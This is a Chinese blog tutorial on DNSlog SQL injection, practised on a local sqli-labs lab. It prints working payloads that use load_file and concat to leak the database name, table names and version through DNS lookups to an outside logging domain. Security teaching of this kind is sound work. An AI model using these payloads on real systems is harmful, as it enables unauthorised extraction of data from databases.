SQL DNSlog注入详解
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。
免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!
一、SQL DNSlog注入简介
SQL Dnslog注入是一种特殊的SQL注入显示方式,我们都知道,不论是使用基于bool的SQL盲注,还是基于时间的SQL盲注,都有一个问题,即注入的时间比较慢。此外,还有一些非常特殊的应用场景,我们可以把我们的payload放到目标站点上执行,但是目标站点没有明显的回显,在这种情况下,我们就可以使用SQL DNSLog注入。
DNSlog的SQL注入,指的是使用load_file函数,使得站点访问时加载我们指定的文件,该函数支持加载远程文件。这样,我们就可以将load_file()函数的参数设置成我们指定的站点,并且使用concat函数来执行我们想要探测的SQL语句,并且把SQL语句的执行结果作为load_file()函数访问站点的一部分,当我们发起DNS请求时,目标站点可以通过设置来记录这些信息,于是也就得到了SQL语句执行的结果。
二、SQL DNSlog注入实战
想要实现DNSLog注入,那么我们就必须先拥有一个能够正常进行DNS查询,并且能够把域名请求记录下来的服务器,http://ceye.io/就是一个可以实现并记录DNS域名查询结果,并且帮助我们实现DNSLog注入的网站。
我们在注册该站点后,该站点会给予我们一个子域名,如下图红线所示:
我们只要发起对该子域名下的次级子域名的DNS访问请求,就可以借此被该站点记录,并且显示给我们。
基于此,我们可以实现DNSLog注入了。
我们使用sqli_lab作为靶场,该靶场原始网页如下所示:
http://192.168.136.2/sqli/Less-1/?id=1
首先,我们可以构造DNSLog注入的payload,
http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select database()),'.ubhdz9.ceye.io\\abc'))--+
在上述payload中,我们把select database()语句嵌入到了load_file()函数中,使其作为load_file()函数的一部分,使得该站点启用DNS查询。
同理,我们可以构造其他形式的payload,例如查询数据库表名的payload:
http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='security' limit 1,1),%27.ubhdz9.ceye.io\\abc'))--+
以及查询数据库版本的payload:
http://192.168.136.2/sqli/Less-1/?id=1' and load_file(concat('\\\\',(select version()),'.ubhdz9.ceye.io\\abc'))--+
上述payload执行结果如下图所示:
从上图可以看出,我们的SQL DNSLog注入成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200
相关文章
- 代码审计-Thinkphp3框架EXP表达式SQL注入
- ABP源码分析六:依赖注入的实现
- Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。
- SQL注入(一) - 入门篇
- SQL User-Agent注入详解
- SQL堆叠注入详解
- SQL二次注入详解
- 依赖注入[4]: 创建一个简易版的DI框架[上篇]
- PHP查询登录中的sql注入
- SAP Spartacus 中的依赖注入 Dependency Injection 介绍
- SAP Spartacus table cell如何通过cxOutlet在运行时动态注入组件
- 数据库安全风险行为 目录 1. 数据库安全风险行为2 1.1. Sql注入SQLi)攻击行为2 1.2. . 过多的、不适当的和未使用的特权2 1.3. 2. 权限滥用(数据库系统管理员和开
- 通杀! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
- 16 - vulhub - Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)
- WEB漏洞攻防 - SQL注入 - 二次注入
- 浅析SQL注入
- 【Android 逆向】Android 进程注入工具开发 ( Visual Studio 开发 Android NDK 应用 | Visual Studio 中 SDK 和 NDK 安装位置 )
- Servlet课程0425(七) 到数据库中去验证用户,同时防止SQL注入漏洞
- monkey源代码分析之事件注入方法变化
- 安全测试——SQL注入
- 20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
- 1.4 如何防止sql注入
- 墨者学院 - SQL注入漏洞测试(参数加密)
- Spring依赖注入(一):字段注入的方式是如何工作的?
- 20 - vulhub - ECShop 2.x/3.x SQL注入/任意代码执行漏洞